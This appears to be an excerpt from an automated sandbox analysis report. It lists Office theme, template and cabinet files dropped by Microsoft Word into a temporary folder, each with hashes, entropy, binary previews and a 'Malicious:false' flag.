                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA693.tmp\Slate.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2357051
                                    Entropy (8bit):7.929430745829162
                                    Encrypted:false
                                    SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                    MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                    SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                    SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                    SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Local\Temp\TCDA693.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.516423078177173
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                    MD5:5402138088A9CF0993C08A0CA81287B8
                                    SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                    SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                    SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA721.tmp\Damask.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2218943
                                    Entropy (8bit):7.942378408801199
                                    Encrypted:false
                                    SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                    MD5:EE33FDA08FBF10EF6450B875717F8887
                                    SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                    SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                    SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                    Malicious:false
                                    Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                    C:\Users\user\AppData\Local\Temp\TCDA721.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.544065206514744
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                    MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                    SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                    SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                    SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDAB3A.tmp\Mesh.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3078052
                                    Entropy (8bit):7.954129852655753
                                    Encrypted:false
                                    SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                    MD5:CDF98D6B111CF35576343B962EA5EEC6
                                    SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                    SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                    SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                    Malicious:false
                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                    C:\Users\user\AppData\Local\Temp\TCDAB3A.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.5303110391598502
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                    MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                    SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                    SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                    SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDAD01.tmp\Main_Event.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2924237
                                    Entropy (8bit):7.970803022812704
                                    Encrypted:false
                                    SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                    MD5:5AF1581E9E055B6E323129E4B07B1A45
                                    SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                    SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                    SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                    Malicious:false
                                    Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                    C:\Users\user\AppData\Local\Temp\TCDAD01.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.5434534344080606
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                    MD5:C9812793A4E94320C49C7CA054EE6AA4
                                    SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                    SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                    SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDB07F.tmp\Vapor_Trail.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3611324
                                    Entropy (8bit):7.965784120725206
                                    Encrypted:false
                                    SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                    MD5:FB88BFB743EEA98506536FC44B053BD0
                                    SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                    SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                    SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Local\Temp\TCDB07F.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):288
                                    Entropy (8bit):3.5359188337181853
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                    MD5:0FEA64606C519B78B7A52639FEA11492
                                    SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                    SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                    SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDB0BF.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.4699940532942914
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                    MD5:55BA5B2974A072B131249FD9FD42EB91
                                    SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                    SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                    SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                    C:\Users\user\AppData\Local\Temp\TCDB0BF.tmp\Insight design set.dotx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:modified
                                    Size (bytes):3465076
                                    Entropy (8bit):7.898517227646252
                                    Encrypted:false
                                    SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                    MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                    SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                    SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                    SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                    Malicious:false
                                    Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                    C:\Users\user\AppData\Local\Temp\cab9A9B.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):33610
                                    Entropy (8bit):7.8340762758330476
                                    Encrypted:false
                                    SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                    MD5:51804E255C573176039F4D5B55C12AB2
                                    SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                    SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                    SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                    Malicious:false
                                    Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                                    C:\Users\user\AppData\Local\Temp\cab9A9C.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):20457
                                    Entropy (8bit):7.612540359660869
                                    Encrypted:false
                                    SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                    MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                    SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                    SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                    SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                    Malicious:false
                                    Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.

                                    C:\Users\user\AppData\Local\Temp\cab9AAD.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31471
                                    Entropy (8bit):7.818389271364328
                                    Encrypted:false
                                    SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                    MD5:91AADBEC4171CFA8292B618492F5EF34
                                    SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                    SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                    SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                    Malicious:false
                                    Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                                    C:\Users\user\AppData\Local\Temp\cab9AAE.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):35519
                                    Entropy (8bit):7.846686335981972
                                    Encrypted:false
                                    SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                    MD5:53EE9DA49D0B84357038ECF376838D2E
                                    SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                    SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                    SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                    Malicious:false
